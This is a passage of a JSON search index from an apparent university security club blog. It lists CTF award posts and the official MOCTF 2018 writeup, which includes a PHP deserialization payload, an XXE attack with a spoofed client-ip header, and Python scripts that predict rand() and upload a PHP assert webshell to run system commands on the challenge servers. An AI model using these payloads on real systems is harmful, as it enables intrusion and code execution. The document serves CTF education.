\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n
flag:moctf{500000000}
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n
\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230
-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n
\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n
\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php
<?php\n ini_set('session.serialize_handler', 'php_binary');\n session_start();\n\n if(isset($_POST['username']) && isset($_POST['password'])){\n $username = $_POST['username'];\n $password = $_POST['password'];\n $_SESSION[\"username\"] = $username;\n header(\"Location:./index.php\");\n }\n else if(isset($_SESSION[\"username\"])){\n echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n }\n else ...\n
flag.php
<?php\nsession_start();\nclass MOCTF{\n public $flag;\n public $name;\n function __destruct(){\n $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n if($this->flag == $this->name){\n echo \"Wow,this is flag:\".$this->flag;\n }\n }\n}\n
\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019
ini_set('session.serialize_handler', 'php_binary');\n
\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']
\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct
\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name
\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload
$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n
\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n
\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip
\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type
\u5b57\u6bb5\u662fapplication/json
\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml
\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020
client-ip:localhost\n
\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n
index.php
<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n $result = '';\n while($l--) {\n $result .= chr(rand(ord('a'), ord('z')));\n }\n return $result;\n}\n\nfunction test_rand_code() {\n $ip=$_SERVER['REMOTE_ADDR'];\n $code=get_rand_code();\n $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n @socket_connect($socket, $ip, 8888);\n @socket_write($socket, $code.PHP_EOL);\n @socket_close($socket);\n die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n die('error ext!');\n }\n $code=get_rand_code();\n $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n file_put_contents(\"$savepath\".$finalname, $content);\n usleep(3000000);\n unlink(\"$savepath\".$finalname);\n die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n $oldmask = umask(0);\n mkdir($savepath, 0777);\n umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n $act=$_GET['action'];\n if($act==='upload')\n {\n $filename=$_POST['filename'];\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n $content=$_POST['content'];\n waf($content);\n upload($filename,$content,$savepath);\n }\n else if($act==='test')\n {\n test_rand_code();\n }\n}\nelse {\n highlight_file('index.php');\n}\n?>\n
\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test
\u4f1a\u8c03\u7528test_rand_code
\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload
\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]
\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)
\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php
\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/
\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink
\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py
#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import * \nfrom time import ctime \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n HOST = '' \n PORT = 8888\n BUFSIZ = 128 \n ADDR = (HOST, PORT) \n tcpSerSock = socket(AF_INET, SOCK_STREAM)\n tcpSerSock.bind(ADDR)\n tcpSerSock.listen(5)\n rand_num=0\n l=[]\n while True:\n tcpCliSock, addr = tcpSerSock.accept() \n while True: \n data = tcpCliSock.recv(BUFSIZ) \n if not data: \n break \n data=data[0:6]\n print data,l\n for i in data:\n l.append(ord(i)+1-ord('a'))\n rand_num+=1\n if rand_num==6:\n break\n tcpCliSock.close() \n tcpSerSock.close()\n return l\n\ndef get_salt(l):\n salt=\"\"\n for i in range(6):\n j=len(l)\n r=(l[j-3]+l[j-31])-1\n if r>26:\n r-=26\n #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n l.append(r)\n salt+=chr(r+ord('a')-1)\n #print salt\n return salt\n\ndef get_flag(salt):\n s=hashlib.sha1('119.23.73.3').hexdigest()\n url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n r2=r.post(url1,data=data)\n print salt\n if '404' not in r2.text:\n print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])-int(s[j]))\n get_flag(salt2)\nwords = 
\"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])+int(s[j]))\n get_flag(salt2)\n
put.py
#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n url2=url+\"test\"\n r1=r.get(url2)\n print url2\n print r1.text\ndef upload():\n data={\"filename[4]\":\"jpg\",\n \"filename[2]\":\"jpg\",\n \"filename[1]\":\"php\",\n \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n \"a\":\"system('cat ../../flag.php');\"\n }\n url1=url+\"upload\"\n r2=r.post(url1,data=data)\n print r2.text\n\nfor i in range(6):\n get_test()\nupload()\n
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427
\u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0 \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898 \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e \u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ 
MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002
\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956
\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662
\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002
"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b
(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA
\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5